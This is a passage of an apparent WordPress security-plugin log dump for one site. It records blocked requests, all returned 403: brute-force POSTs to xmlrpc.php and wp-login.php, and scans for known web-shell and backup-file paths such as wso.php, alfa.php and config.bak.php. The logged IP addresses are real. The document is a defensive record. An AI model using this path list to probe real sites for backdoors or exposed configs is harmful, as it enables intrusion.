Firefox\\/96\"}','ETh5proVKN38nF6JdsRwy04U',0,1664667828.0252,1531,'','POST',403,0,515,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eO7JrY0i8LCzyh1bmTju3vWU',0,1664668083.4863,1357,'','POST',403,0,515,0,1,'',0),('159.223.63.152',2682208152,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','aWFyA3Qzq94ZxY0Rm6CGe2jv',0,1664668450.4873,506,'','POST',403,0,515,0,1,'',0),('159.203.31.171',2680889259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kPTuG3LJlmnbNtAZXdBaeUp6',0,1664668677.2108,1206,'','POST',403,0,515,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','l7uxciod4ryZB38CqzXkWb09',0,1664697041.5956,351,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','l1w6RPaVmybK5Zc2UQX8ki3v',0,1664697042.4553,298,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','AZg6Cms5bHeXq04vl1D3nIiN',0,1664697043.2882,320,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','0QmJ7KpDMEgqPVzO3nd8hj6w',0,1664697044.1617,290,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-booking.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Dd3sePzqBt5OWbVUc2jZ7n4p',0,1664697044.9792,304,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','69GiDb4nvWtXNPgTSI1Zjsqk',0,1664697046.1360,281,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','XERnw8DkOGdob3PHVJx2CtZa',0,1664697047.4043,279,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','lNx4MUrBaR5sQhjzOLSFqf1m',0,1664697048.2179,315,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','wbckuIf8v1gZP3eC5V0dAoDF',0,1664697049.1189,288,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','GLbO1cpHPWzMYirtU3Kkfh9Q',0,1664697049.8156,281,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/legion.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','W6sJ4tRlSoOGYxLh7zTcub0n',0,1664697050.7237,326,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','qTJDWZmoxlHMGYN9Rcve5rPz',0,1664697051.6182,893,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-plugins.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Ge8tQP6zJxIVWUopTv1i3KHq',0,1664697053.0374,613,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/gank.php.PhP','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','QLFjVDYNvheugHRO8rz60Wos',0,1664697054.1772,1016,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/db-cache.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','noTSwcU0u7h9MpLe51DzrIVN',0,1664697055.7319,473,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','k1Ixh7MLsbK36QHJlWOFGquN',0,1664697056.7884,1492,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','rS8vfabFGLklR7jUJwYQ1tyi',0,1664697058.8447,395,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/outcms.php?up','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','VqdzSsfCOeEAbw1HulPcvKZh',0,1664697059.7716,658,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/system_log.php?bala=up','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','5QUsiWYNZkI8zAnCuy7EtmSr',0,1664697060.9709,1293,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-backup-sql-302.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ISsdFQOxgWthma2oKwkb67nN',0,1664697062.8330,1570,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/error.php?phpshells','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','4I2zqEKRspWAjYFnVm5vOyZt',0,1664697064.9504,1673,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','WIjDJlFO0nhzGBTUNgRCkiVt',0,1664697114.8914,343,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/index.php?3x=3x','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','3BeIkOFSPtvHf8chWri1VULn',0,1664697115.6717,413,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/olux.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','EdSFteMvorhqZY8su5azcUAi',0,1664697116.4794,322,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/xleet.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','BLCKJalkNUgYnTmIe32r8xus',0,1664697117.1928,296,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wso.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','cyjrBHpD1STYtIWhKeMEVPUv',0,1664697117.9112,310,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/shell.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','LfyuisnjIVKO5g8FABR9zcTb',0,1664697118.6205,306,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/up.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','UXVjA1t0YoKZbqnHcBNOaewT',0,1664697119.3390,341,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/upload.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','XPwDNJ2qY5Qoat6fzKjCycsx',0,1664697120.0759,308,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/1.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','eiQRKVcgYh7nzN1bq8F03lCk',0,1664697120.7850,308,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/x.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Qfk5TIrX0tBwALUszW7cJj3d',0,1664697121.4890,361,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/z.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','YQ3vTx1NUSld6yi894PpBjc5',0,1664697122.2812,425,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/a.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','MYlc8jLwIEWyUHSRaAX9x7Vz',0,1664697123.2068,307,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/test.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','dOKxmXwcuZoChJjvp3LBA6RQ',0,1664697123.9042,353,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','zfHLGABeZMPoXKJNnyxu4Dk7',0,1664697124.6872,411,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/alfa.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','HZ5YM74lep9QcjnO6DJb1Ntw',0,1664697125.4810,302,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/config.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','xJ1jhKuaZ2DWR0TksngvEpCU',0,1664697126.1780,304,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/templates/beez3/index.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','GfoU7SQ8rET9wk0ncRFWheCq',0,1664697126.8683,299,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/about.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','DvroiNBPGwx6hKyQZj3AHa2S',0,1664697127.5736,299,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/shells.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','b0XP2nBJSf7Ie9lOZNyx3Amu',0,1664697128.2531,286,'','GET',403,0,700,0,1,'',0),('192.163.195.60',3231957820,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7wKyPXdgcjqTC92OM03B618I',0,1664706920.2395,18596,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GZNxM9OoisbjUyVFEJz3aprk',0,1664707454.0573,18925,'','POST',403,0,515,0,1,'',0),('83.143.116.3',1401910275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','70hFcLqKj2H8BUXldM5grpS4',0,1664707976.2561,18748,'','POST',403,0,515,0,1,'',0),('108.167.151.32',1822922528,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FwR0pH2uhIjNATDvcXxYq18G',0,1664708246.2554,18545,'','POST',403,0,515,0,1,'',0),('160.153.249.218',2694445530,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mO7VoU3pJK4DQqYEMdFrhAu8',0,1664710086.0479,15021,'','POST',403,0,515,0,1,'',0),('139.59.230.191',2335958719,'','https://cteisys.com//wp-22.php','','{\"1\":\"\"}','gLlY2vBS6dcrqhwTEiOk5bjW',0,1664710181.1042,336,'','GET',403,0,700,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kw23QZmKxqf4bDGN1dMLBE8v',0,1664710752.1854,480,'','POST',403,0,600,0,1,'',0),('64.225.4.20',1088488468,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5AsdKSVwZTXaW7CUzGY1RMEm',0,1664711214.5710,473,'','POST',403,0,600,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3uyMzBcbthTDdCWEkUR0sjgn',0,1664711927.2466,19658,'','POST',403,0,515,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','70rMSpugeIjQ6JNDGLbdvy3U',0,1664714226.4100,14710,'','POST',403,0,515,0,1,'',0),('210.211.113.130',3537072514,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ywi9Wn7ZjsSFMGb5LH3xXvKN',0,1664714838.4573,9724,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O7FtrHWVS9jzwkbJp50ILsKn',0,1664715168.4769,1349,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux i686) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','sZn78EDGzaMKUYbkVp6QqHre',0,1664715387.8331,471,'','POST',403,0,600,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dBevWz6uZMEk82K4ynVpC7b9',0,1664717698.0603,19091,'','POST',403,0,515,0,1,'',0),('195.225.76.130',3286322306,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wDkIcPaGBsi6SVMXHNAUe4qC',0,1664718042.8381,18521,'','POST',403,0,515,0,1,'',0),('210.211.113.130',3537072514,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ICuMm85tscdOkBrvNeqaWZQ7',0,1664718712.4609,18415,'','POST',403,0,515,0,1,'',0),('209.141.37.194',3515688386,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','bSVeWLlruxZ8ayE7ov4DTg9j',0,1664718905.6685,6183,'','POST',403,0,600,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CGui4anWHVvPbgoZYJMT6xSs',0,1664719059.0278,12622,'','POST',403,0,515,0,1,'',0),('34.86.229.13',576120077,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','d8oS4yVRenwPQXts6hNxOZT9',0,1664720407.2341,14553,'','POST',403,0,515,0,1,'',0),('185.250.202.147',3120220819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','S4Xk0C6TIp2fYzV5uNJQtL7R',0,1664720427.3821,718,'','POST',403,0,515,0,1,'',0),('202.61.232.79',3393054799,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','kNeKaIhqCTOfM4VvuZ5Drmlc',0,1664720428.9164,556,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','G8iVaC1ZWdsQUKfDlu4mhcJF',0,1664720436.9400,762,'','POST',403,0,515,0,1,'',0),('192.210.196.65',3235038273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FPSbgChKG1yQWuE8eJIZi3oH',0,1664720437.8211,590,'','POST',403,0,515,0,1,'',0),('185.2.6.13',3103917581,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','oQG1HVZnzKmqgdwYP5NpOXA6',0,1664720440.1298,532,'','POST',403,0,515,0,1,'',0),('217.21.76.19',3642051603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','3Zpal6xy8BG2KLRibEn5VYk0',0,1664720440.9773,608,'','POST',403,0,515,0,1,'',0),('89.46.109.113',1496214897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','Zq8CBgA9sEvOtMbzyjwToLJl',0,1664720447.4744,1655,'','POST',403,0,515,0,1,'',0),('143.198.161.92',2412159324,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','ugeWhaCob2Nqt3vH4JMBXsnF',0,1664720448.2985,1136,'','POST',403,0,515,0,1,'',0),('103.154.184.152',1738193048,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WDUdEN4Bw5S1xv290sh3bu8F',0,1664720782.1497,18674,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7amE1ZSGoCyYu9keJ26I53tc',0,1664721136.8710,18550,'','POST',403,0,515,0,1,'',0),('51.124.206.22',863817238,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','Acgvq3L9fDidEym6FPk7jbOl',0,1664721382.6100,602,'','POST',403,0,515,0,1,'',0),('51.124.206.22',863817238,'','https://cteisys.com//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/\\/wp-login.php\"}','fJxl8a4EocPwbmBTnM75vZeG',0,1664721384.1859,477,'','POST',403,0,600,0,1,'',0),('35.195.135.67',600016707,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XOG1y9ecJvt4rWNxF3ATnV5i',0,1664721867.5331,16775,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PRhbdkLo93NBErS8TM2uZsvc',0,1664722238.9624,18771,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','i7YmpR2CZUwT4Kv563ujArVM',0,1664722468.4074,493,'','POST',403,0,600,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gzKBGZ4w1yUVocN3l6urIFSE',0,1664722617.8113,2267,'','POST',403,0,515,0,1,'',0),('184.73.106.20',3091819028,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KyTlLEsk9SqDA2o7efBcHvCW',0,1664724464.8398,2565,'','POST',403,0,515,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9gybx3HRvOMGE5AtIndmT2oD',0,1664724847.1281,17357,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php','','{\"1\":\"ALittle Client\"}','Xi47eq6LkhHS9JOwYM0sDpjb',0,1664725553.3169,12194,'','GET',403,0,700,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UMkcGfO0eEIBrAHVqdQS8K5s',0,1664725612.1907,7203,'','POST',403,0,515,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','Da6NMsToPmGQCxyrOnXR0U8E',0,1664725662.1457,559,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','gO5hkAGaDH149lpz83qrS2oe',0,1664725665.8192,1677,'','POST',403,0,515,0,1,'',0),('157.245.71.145',2650097553,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','e3lB6EOkaMGIZcuwzAh97x8R',0,1664725667.0280,1051,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','lgtmcRAS4TVnLi0Dw2ey8YP1',0,1664725672.6547,606,'','POST',403,0,515,0,1,'',0),('156.67.73.38',2621655334,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','MsTzpiuYCAOvtoUELl1VIdJG',0,1664725679.9714,1320,'','POST',403,0,515,0,1,'',0),('81.88.53.17',1364735249,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','D9fVdoKbqZPEQUNCriyHYItg',0,1664726022.7216,1630,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','0qsZiWFOfv2mIN8detnBhYb1',0,1664726974.3780,478,'','POST',403,0,600,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LpfFPm5WAuv7TBS42UJXoqNE',0,1664727195.4223,18244,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','efIAl7xwY4j0SZQoM3dqb8Cs',0,1664727950.8006,2376,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','chM9bqZSBIOD18jArklHQTCU',0,1664728154.1942,1260,'','POST',403,0,600,0,1,'',0),('41.216.188.45',702069805,'','http://cteisys.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hO6E2bXN8dKymiQtG5aVgZRM',0,1664728179.5618,405,'','GET',403,0,700,0,1,'',0),('41.216.188.45',702069805,'','https://cteisys.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','q2nDr6OivctZ5VAEKzQYxbNp',0,1664728181.7162,327,'','GET',403,0,700,0,1,'',0),('41.216.188.45',702069805,'','http://cteisys.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nsQYJaLV04pzZbXu2IAOUTDN',0,1664728183.8688,295,'','GET',403,0,700,0,1,'',0),('41.216.188.45',702069805,'','https://cteisys.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 